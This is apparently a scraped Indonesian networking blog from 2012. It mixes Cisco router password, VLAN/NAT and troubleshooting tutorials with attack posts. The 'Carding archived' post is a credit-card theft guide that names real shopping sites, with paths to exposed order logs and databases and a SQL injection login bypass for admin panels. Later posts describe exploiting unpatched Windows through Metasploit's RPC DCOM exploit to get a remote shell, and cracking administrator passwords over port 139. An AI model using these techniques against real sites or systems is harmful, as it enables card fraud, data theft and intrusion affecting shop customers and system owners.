Jumat, Agustus 31, 2012

Enable pass line vty 0 console

Asslamu`alaikum Wr.Wb.
I am now going to post about how to enable the password line vty 0 cisco router console. Configuration Procedure In this example, a password is configured for all users attempting to use the console.

    From the privileged EXEC (or "enable") prompt, enter configuration mode and then switch to line configuration mode using the following commands. Notice that the prompt changes to reflect the current mode.

        router#configure terminal
        Enter configuration commands, one per line.  End with CNTL/Z.
        router(config)#line con 0
        router(config-line)#

    Configure the password, and enable password checking at login.

        router(config-line)#password ahri
        router(config-line)#login

    Exit configuration mode.

        router(config-line)#end
        router#
        %SYS-5-CONFIG_I: Configured from console by console

    Note: Do not save configuration changes to line con 0 until your ability to log in has been verified.
    show running-config - displays the current configuration of the router.

        router#show running-config
        Building configuration...
        ...

        !--- Lines omitted for brevity

        !
        line con 0
        password ahri
        login
        line 1 8
        line aux 0
        line vty 0 4
        !
        end

    To test the configuration, log off the console and log in again, using the configured password to access the router:

        router#exit

        router con0 is now available

        Press RETURN to get started.

        User Access Verification
        Password:

        !--- Password entered here is not displayed by the router

        router>

    Note: Before performing this test, ensure that you have an alternate connection into the router, such as Telnet or dial-in, in case there is a problem logging back into the router.


 Semoga bermanfaat.

Configuration Line vty 0 4 telnet

Assalamu`alaikum Wr.Wb.

I will now post on configuring telnet password. and then this is configuration Procedure
In this example, passwords are configured for users attempting to connect to the router on the VTY lines using Telnet.

    From the privileged EXEC (or "enable") prompt, enter configuration mode and enter username/password combinations, one for each user for whom you want to allow access to the router:

        router#configure terminal
            Enter configuration commands, one per line.  End with CNTL/Z.
            router(config)#username telkom password bandung
            router(config)#username spilner password jakarta
            router(config)#username ahri password karawang

    Switch to line configuration mode, using the following commands. Notice that the prompt changes to reflect the current mode.

        router(config)#line vty 0 4
        router(config-line)#

    Configure password checking at login.

        router(config-line)#login local

    Exit configuration mode.

        router(config-line)#end
        router#
        %SYS-5-CONFIG_I: Configured from console by console

    Note: In order to disable auto Telnet when you type a name on the CLI, configure no logging preferred on the line that is used. While transport preferred none provides the same output, it also disables auto Telnet for the defined host that are configured with the ip host command. This is unlike the no logging preferred command, which stops it for undefined hosts and lets it work for the defined ones.

Verify the Configuration

Examine the configuration of the router to verify that the commands have been properly entered:

    show running-config - displays the current configuration of the router.

        router#show running-config
        Building configuration...
        !

        !--- Lines omitted for brevity

        !
        username telkom password 0 bandung
        username spilner password 0 jakarta
        username ahri password 0 karawang
        !

        !--- Lines omitted for brevity

        !
        line con 0
        line 1 8
        line aux 0
        line vty 0 4
         login local
        !
        end

Here is a sample output if the address of interface ethernet 0 were 10.1.1.1:

    router#telnet 10.1.1.1
    Trying 10.1.1.1 ... Open

    User Access Verification
    Username: ahri
    Password:

    !--- Password entered here is not displayed by the router

Semoga bermanfaat.

Configuration VLAN and NAT

Asslamu`alaikum Wr.Wb.

Peace, now I'll try to post about the VLAN configuration of the router and NAT. Below is a picture of the topology that will be created.




The steps to configure a topology with NAT and OSPF:

STEP 1 : Provision
 
To facilitate please konfigurasian VLAN
use VTP (VLAN Trunking Protocol).
• Server is Switch1 and Switch2 as Client.
Configursai enabling NAT where you think it should be in NAT
Use the easiest Route table that you understand
Use BGP Route

SWITCH 1
Switch#enable
Switch#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Switch1 (config)#vtp mode server
Switch1 (config)#vtp domain ahri
Switch1 (config)#vtp password ahri
Switch1(config)#vlan 2
Switch1(config-vlan)#name hrd
Switch1(config-vlan)#vlan
Switch1(config-vlan)#vlan 3
Switch1(config-vlan)#name acc
Switch1(config-vlan)#vlan 4
Switch1(config-vlan)#name production
Switch1(config-vlan)#vlan 5
Switch1(config-vlan)#name direktur
Switch1(config-vlan)#vlan 6
Switch1(config-vlan)#name  IT server
Switch1(config-vlan)#exit 

Switch1#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Switch1(config)#interface fastEthernet 0/2
Switch1(config-if)#switchport mode access
Switch1(config-if)#switchport access vlan 2
Switch1(config-if)#interface fastEthernet 0/3
Switch1(config-if)#switchport mode access
Switch1(config-if)#switchport access vlan 3
Switch1(config-if)#interface fastEthernet 0/4
Switch1(config-if)#switchport mode access
Switch1(config-if)#switchport access vlan 4
Switch1(config-if)#interface fastEthernet 0/5
Switch1(config-if)#switchport mode access
Switch1(config-if)#switchport access vlan 5
Switch1(config-if)#interface fastEthernet 0/6
Switch1(config-if)#switchport mode access
Switch1(config-if)#switchport access vlan 6
Switch1(config-if)#^Z


STEP 2 : Create switch2 as a member VLAN 6
SWITCH2
Switch2>enable
Switch2#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Switch2(config)#interface fastEthernet 0/1
Switch2(config-if)#switchport mode trunk
Switch2(config-if)#switchport trunk native vlan 1
Switch2(config-if)#exit
Switch2(config)#vtp mode client
Setting device to VTP CLIENT mode.
Switch2(config)#vtp domain ahri
Switch2(config)#vtp password ahri
Setting device VLAN database password to ahri
Switch2(config)#interface fastEthernet 0/6
Switch2(config-if)#switchport mode access
Switch2(config-if)#switchport access vlan 6

STEP 3 : Encapsulation on router1
ROUTER 1
Route1r>enable
Router1#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router1(config)#interface fastEthernet 0/0.2
Router1(config-subif)#encapsulation dot1Q 2
Router1(config-subif)#ip address 192.168.1.1 255.255.255.252
Router1(config-subif)#interface fastEthernet 0/0.3
Router1(config-subif)#encapsulation dot1Q 3
Router1(config-subif)#ip address 192.168.1.5 255.255.255.252
Router1(config-subif)#interface fastEthernet 0/0.4
Router1(config-subif)#encapsulation dot1Q 4
Router1(config-subif)#ip address 192.168.1.9 255.255.255.252
Router1(config-subif)#interface fastEthernet 0/0.5
Router1(config-subif)#encapsulation dot1Q 5
Router1(config-subif)#ip address 192.168.1.13 255.255.255.252
Router1(config-subif)#interface fastEthernet 0/0.6
Router1(config-subif)#encapsulation dot1Q 6
Router1(config-subif)#ip address 192.168.2.1 255.255.255.248
Router1(config-subif)#exit


STEP 4 : Configure OSPF on router1
ROUTER 1
Router1(config)#router ospf 1
Router1(config-router)#network 192.168.1.0 0.0.0.3 area 0
Router1(config-router)#network 192.168.4.0 0.0.0.3 area 0
Router1(config-router)#network 192.168.8.0 0.0.0.3 area 0
Router1(config-router)#network 192.168.12.0 0.0.0.3 area 0
Router1(config-router)#network 192.168.2.0 0.0.0.7 area 0
Router1(config-router)#exit

STEP 5 : Giving IP address on each router that has been used as a VLAN member.
ROUTER3
Router3>enable
Router3#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router3(config)#interface fastEthernet 0/1
Router3(config-if)#ip address 172.16.0.1 255.255.255.0
Router3(config-if)#no shutdown

ROUTER4
Router4>enable
Router4#configure terminal
Router4(config)#interface fastEthernet 0/1
Router4(config-if)#ip address 172.16.1.1 255.255.255.0
Router4(config-if)#no shutdown

ROUTER5
Router5>enable
Router5#configure terminal
Router5(config)#interface fastEthernet 0/1
Router5(config-if)#ip address 172.16.2.1 255.255.255.0
Router5(config-if)#no shutdown
ROUTER6
Router6>enable
Router6#configure terminal
Router6(config)#interface fastEthernet 0/1
Router6(config-if)#ip address 172.16.3.1 255.255.255.0
Router6(config-if)#no shutdown

STEP 6 : Configure OSPF routing on each router that has been used as a VLAN member.
ROUTER3
Router3(config)#router ospf 1
Router3(config-router)#network 192.168.1.0 0.0.0.3 area 0
Router3(config-router)#network 172.16.0.0 0.0.0.255 area 0

ROUTER4
Router4(config)#router ospf 1
Router4(config-router)#network 192.168.1.4 0.0.0.3 area 0
Router4(config-router)#network 172.16.1.0 0.0.0.255 area 0

ROUTER5
Router5(config)#router ospf 1
Router5(config-router)#network 192.168.1.8 0.0.0.3 area 0
Router5(config-router)#network 172.16.2.0 0.0.0.255 area 0

ROUTER6
Router6(config)#router ospf 1
Router6(config-router)#network 192.168.1.12 0.0.0.3 area 0
Router6(config-router)#network 172.16.3.0 0.0.0.255 area 0

 
STEP 7 : Giving IP Address that will be the IP NAT outside.
ROUTER1
Router1(config)#interface fastEthernet 0/1
Router1(config-if)#ip address 222.124.194.2 255.255.255.252
Router1(config-if)#no shutdown

:: Provide default routing
Router1(config)#ip route 0.0.0.0 0.0.0.0 222.124.194.1
Router1(config)#exit

STEP 8 : Configuration NAT
ROUTER1
Router1(config)#interface fastEthernet 0/1
Router1(config-if)#ip nat outside
Router1(config-if)#exit

Router1(config)#interface fastEthernet 0/0.2
Router1(config-subif)#ip nat inside
Router1(config-subif)#interface fastEthernet 0/0.3
Router1(config-subif)#ip nat inside
Router1(config-subif)#interface fastEthernet 0/0.4
Router1(config-subif)#ip nat inside
Router1(config-subif)#interface fastEthernet 0/0.5
Router1(config-subif)#ip nat inside
Router1(config-subif)#exit
Router1(config)#ip nat inside source list 1 interface fastEthernet 0/1 overload
Router1(config)#access-list 1 permit any
Router1(config)#router ospf 1
Router1(config-router)#default-information originate

STEP 9 : Configuration NAT Static
:: Static NAT is designed to map the mapping (pemetaan) one-to-one between local and global addresses.
 
ROUTER1
Router1(config)#ip nat inside source static 192.168.2.2 222.124.194.2
Router1(config)#ip nat inside source static tcp 192.168.2.3 88 222.124.194.2 88

Nah......tuch diatas adalah konfigurasinya.
semoga bermanfaat.

Selasa, Agustus 28, 2012

Carding archived

Assalamu`alaikum Wr.Wb.

     Sekarang saya akan mencoba share sedikit tentang carding untuk yang baru mau mengenal dunia carding. Mohon di abaikan bagi master-master carding di luar sana,yang pastinya sangat mahir dalam melakukan carding ini.
     Saya harap ini jangan digunakan untuk hal-hal yang merugikan orang lain karena kegiatan ini tergolong tindak kejahatan, oleh karena itu. Sebaiknya ini di jadikan pengetahuan semata dan di gunakan untuk para calon administrator web shopping cart agar lebih teliti dan safety dalam mengelola database,log,dan web itu sendiri.

Ok Lets begin >>>>>

1. CGI store Log

     Disini kamu harus usaha sendiri untuk mencari target yang akan kamu pakai cc nya.
Coba gunakan ini:

A. http://www.chaswells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
B. And then delete Repair_Manuals.htm in url/browsing  sehingga menjadi http://www.chaswells.com/cgi-bin/store/index.cgi?page=
C. Input file is behind the web :
.../admin/files/order.log
for example : http://www.cashwells.com/cgi-bin/store/index.cgi?page=admin/file/order.log
D. So that comes out from the site is number cc (credit card).

2.   Admin Take Over

Same as above you must try yourself to find the target.
This should be done:

A. http://www.partsupply.in.th/shopadmin.asp
B. And then next use sql injection techniques
     user : 'or"='
     pass : 'or"='
C. Trus kamu buka file" yang ada disana satu persatu. Dapat deh no CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. TApi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. coba cari lagi target yang lain.

3. Database Downloadable

Same as above you must try yourself to find the target.
This should be done:

A. http://www.youngsliquors.com/winestore/shopadmin.asp
B. And then next delete shopadmin.asp in url/browsing so be http://www.youngsliquors.com/winestore/
C. Input file is behind the web:
     shopdbtest.asp
     for example : http://www.youngsliquors.com/winestore/shopdbtest.asp
 D. And then look the name database and the place : xDatabase and xDblocation
    example:
    xDatabase : shopping300
    xDatabase :..../.../../.../www.youngsliquors/5498761211
E. Sekarang untuk mendownload file shopping300 dapat dilakukan dengan merubah url/browsing nya menjadi:
     http://www.youngsliquors.com/winestore/shopping300.mdb
F. Kalo sudah di download, buka file shopping300.mdb dengan ms.Access.

4. Metacart

Same as above you must try yourself to find the target.
This should be done:

A. http://www.imagexpres.com/metacart/moreinfo.asp
B. And then next delete moreinfo.asp in url/browsing so be http://www.imagexpres.com/metacart/
C. Input file is behind the web ;
     database/metacart.mdb
     example : http://www.imagexpres.com/metacart/database/metacart.mdb
D. Kalo sudah di download, buka file metacart.mdb dengan ms.access

5. PDshopPro Shopping Cart

Same as above you must try yourself to find the target.
This should be done:

A. http://www.marktwainbooks.com/shop/category.asp?catid=4
B. And then next delete shop/category.asp?catid=4 in url/browsing so be http://www.marktwainbooks.com
C. Input file is behind the web:
     admin/dbsetup.asp
     example : http://www.marktwainbooks.com/admin/dbsetup.asp
D. Maka yang keluar dari situs itu adalah:
     Your Database Type:
     Microsoft Access
     Your Connection String :
     Driver={Microsoft Access Driver(*.mdb)};DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
     Current Status :
     Connection to Database OK.
     Database Primary 'setup' Table Found!
     Database Permissions OK!
E. Sekarang untuk mendownload file pdshoppro.mdb dapat dilakukan dengan merubah url/browsing nya menjadi:
     http://www.marktwainbooks.com/data/pdshoppro.mdb
F. Kalo sudah di download, buka file pdshoppro.mdb dengan Ms.Access.

Ok,itu sebagian cara untuk teknik mencari data CC target.

----------------------------------------------------------------------------------------------
Ini hanya sebuah informasi yang perlu anda ketahui.
Semoga bermanfaat.
----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

Jumat, Agustus 24, 2012

Troubleshooting network

     Kali ini saya posting tentang troubleshooting, bukan konfigurasi. jadi apa itu troubleshooting??? troubleshooting adalah ketika kita memperbaiki jaringan yang bermasalah.for example,misalkan anda menggunakan NFS server untuk mengekspor directory ke client.karena listrik padam dan anda tidak menggunakan battery untuk daya listrik cadangan.maka server dan client mati,tak lama kemudian listrik menyala, kedua perangkan reboot.setelah log in di client.Anda ingin mengakses directory di server,tapi tidak bisa...What happened?once could,but not now!
    Untuk memperbaiki masalah kita harus melakukan troubleshooting - istilah yang biasanya digunakan untuk proses identifikasi dan penyelesaian masalah.Pada saat menghadapi masalah yang sangat banyak tentang troubleshooting network,banyak administrator tidak begitu metode yang baku, tapi memang terkadang kita tidak perlu mempunyai metode yang baku tapi metode baku tersebut bisa kita jadikan sebagai tempat untuk memulai troubleshooting.

1. Model OSI
     Dasar setiap metode troubleshooting di sini adalah tujuh layer pada model referensi OSI. Jika anda tidak tahu apa itu model OSI, secara singkat itu adalah model jaringan yang terdiri dari tujuh layer, dimana susunanya dari layer paling atas layer 7 adalah Application, Presentation, Session, Transport, Network, Data link, dan physical.
     Cara kerja model OSI adalah data berjalan dari layer Application ke Physical, lau menuju ke layer physical penerimaan melalui jaringan dengan perantara medium fisik ( misalnya kabel Ethernet ). dari situ data berjalan ke atas menuju Application penerima.
     Setelah data sampai, si penerima menjadi si pengirim, dan si pengirim menjadi si penerima. Respons dari si penerima berjalan melalui jalan yang berlawanan dan kembali ke si pengirim awal. So, jika ada salh satu layer yang tidak berfungsi, maka data tidak bisa berjalan. For example, jika layer data link tidak berfungsi maka data tidak akan bisa berjalan dari layer Application ke layer Physical.

2. Bottom - Up
     Metode Bottom-up dimulai dari layer paling bawah yaitu: layer 1 (Physical), baru ke atas ke layer Application.For example, jika masalahnya ada di entri MAC yang sama pada table alamat MAC swicth, maka perbaiki dulu masalah tersebut sebelum melakukan pengecekan pada layer network ( Misal alamat IP atau ROUTING ).

3. Top - Down
     Pada dasarnya sama dengan metoda Bottom-Up, hanya saja pada metode Top-Down, troubleshooting dimulai dari layer paling atas, yaitu layer 7 (Application) baru menuju ke bawah ke layer Physical.

4. Divide and Conquer
     Metode ini membutuhkan sedikit naluri. Pada metode Devide and Conquer, troubleshooting bisa dimulai dari layer mana saja yang menurut anda sebagai penyebab masalah. Dari situ, anda bisa menuju ke atas atau ke bawah.

Memilih Metode
     Pemilihan metode bergantung pada naluri anda. dimana masalah itu terjadi, sebagai contoh, jika ada user yang tidak bisa browsing ke internet.

Respons Jika koneksi jaringan bisa dilakukan (atas), dan resolve DNS gagal atau host memang tidak ada (bawah).

Anda bisa menggunakan metode bottom - up karena kemungkinan besar kabel jaringan user rusak atau karena masalah sejenisnya.

Persiapkan diri
     Troubleshooting membutuhkan pikiran yang tenang. Namun terkadang masalah jaringan membuat seorang administrator / kita panik dikarnakan user mengeluh, atasan marah, deadline menunggu. oleh karena itu kita jangan sampai terbawa suasana dan kita harus yakin bisa menyelesaikan masalah itu ( we can do it ).

Buat dokumentasi
     Apapun yang menyebabkan jaringan anda down ada kemungkinan bisa terjadi kembali.oleh karena itu kita mendokumentasikan setiap masalah yang kita hadapi agar supaya kita lebih mudah dan cepat menyelesaikan masalah tersebut.

Lakukan cek fisik
     Sebagian besar penyebab masalah pada jaringan yang tadinya berfungsi selalu berkaitan dengan fisik. Luangkan waktu untuk mengecek hal berikut:
- Cek kartu jaringan terpasang dengan baik atau tidak.
- Cek cahaya LED pada kartu jaringan.
- Cek Apakah ada gelombang Electromagnetic didekat kabel ethernet / Modem yang bisa menggangu sinyal.

Coba Reboot
     Tidak menemukan masalah pada koneksi fisik?? mungkin ada error software. Coba restart semua system yang bermasalah, sering kali ini bisa menyelesaikan masalah.

 Buat kronologi kejadian
     Jika jaringan masih saja down setelah anda melakukan cek fisik dan me-Reboot system.Coba di ingat-ingat apa yang terjadi atau apa yang anda lakukan sebelum masalah tersebut muncul. Bisa jadi hal tersebut yang mengakibatkan jaringan anda down.

Find information to user
     Apakah user mengubah system konfigurasi mereka?menginstalasi software baru?Apakah mereka menggunakan IP static dan mengisi IP baru, karena alamat tersebut "lebih bebas".selagi mengidentifikasi apa yang terjadi, cobalah berpikir di luar sisi teknis.

 Masih bermasalah?
     Jika anda masih mengalami masalah, coba pastikan hal berikut:
- Kerusakan Hardware
- Kartu jaringan
- Hub
- Adaptor
- Gateway
- Switch
- Router
- Dan komponen lainnya bisa saja.
Coba identifikasi masalah dengan menggunakan ping dan jika perlu coba ganti dengan perangkat yang sudah pasti berfungsi. Semoga bermanfaat.............

Sumber : Wikipedia, ozcorp indonesia.
 

Rabu, Agustus 22, 2012

Hacking menggunakan Metasploit

       METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.

Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 4.0, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 4.0 lebih banyak exploitnya. Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim buffer Overflow pada system korban, sehingga kita dapat mentakeover shellnya.
Langsung saja, berikut installasinya di Windows.

1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google.

2.  Kemudian install, dan jalankan msfweb.

 










Maka akan muncul window shell seperti berikut.


3. Buka Web Browser bisa Internet Explorer, Mozilla, Google Chrome, dll. Dan pergi ke http://127.0.0.1:55555, maka tampilannya seperti berikut.

 

Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti.

4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP, terus kita lakukan port scanning. Disini kita akan mencoba pada system OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada port scanning, pastikan port untuk MSRPC tebuka (default = open). 

Download NMAP di  


5.Memilih Exploit.
Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploit Microsoft RPC DCOM MSO3-026.

 

Pilih target pada pilihan Select Target

6. Memilih Payload

 

Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi-fungsi payload :
win32_adduser : menambah user pada system korban
win32_bind : masuk ke shell korban
win32_bind_dllinject : untuk upload / inject dll files
win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (I like it).
win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).
win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban
win32_exec : mengeksekusi command di system korban.
Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.


RHOST ==>> Ip Address Korban (Remote).
LHOST ==>> Ip Address Kita (Local)
RPORT ==>> Port Korban
LPORT ==>> Local Open Port


Setelah di isi semua, kemudian klik exploit untuk memulai menghack target.

Selamat mencoba.

Source: http://lebaksono<dotz>wordpress<dotz>com/2010/11/16/hacking-dengan-metasploit-exploit/

Sumber : Binushacker,wahyu (a'Gatot),lirva32,telkom PDC,ozcorp indonesia.



  •  Nie nte klo mau nonton video tutorial metasploit menggunakan Armitage :





Hacking LAN

Hack Local Area Network 

This technique will be taking advantage of Port 139.
Most of the time, Port 139 will be opened.
First of all,I will do a port scanning at the target computer which is 192.168.40.128.
This computer is inside my LAN network.
I will scan it using Nmap.
You can get both of them on the Internet.
After you get both of them,put them in the C:\ directory.

You now need to create a null session to the target computer.

Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.
We will first using USER2SID to get the ID.

We will test against the Guest account because Guest account is a built in account.
After we get the ID,we need to do some modification on the ID.
We take the ID we get from the guest account and modified it become
“5 21 861567501 1383384898 839522115 500″.
Please leave out the S-1-,leave out all the – too.

Now you will see that you get the username of the Administrator account.
In this case,the Administrator account is Administrator.
Create a text file called user.txt and the content will be the username of the Admin account.

Prepare yourself a good wordlist.
Now put both of them in the same directory with the NetBios Auditing Tool.
Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.
Press on enter and the tool will run through the passlist.
In this case,I have get the password.
In order to proof that I can get access to the target computer using this password.
After you press enter,it will prompt you for the username and password.
Therefore,just input them inside the prompt and continue.
Target C drive will be on your screen.
In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:

Sumber : Binushacker,wahyu (a`gatot jatayu),kang hero (lirva32),NAP Telkom PDC,cv.ozcorp indonesia.

  • Bonus nie: 



 Mantap kan gan??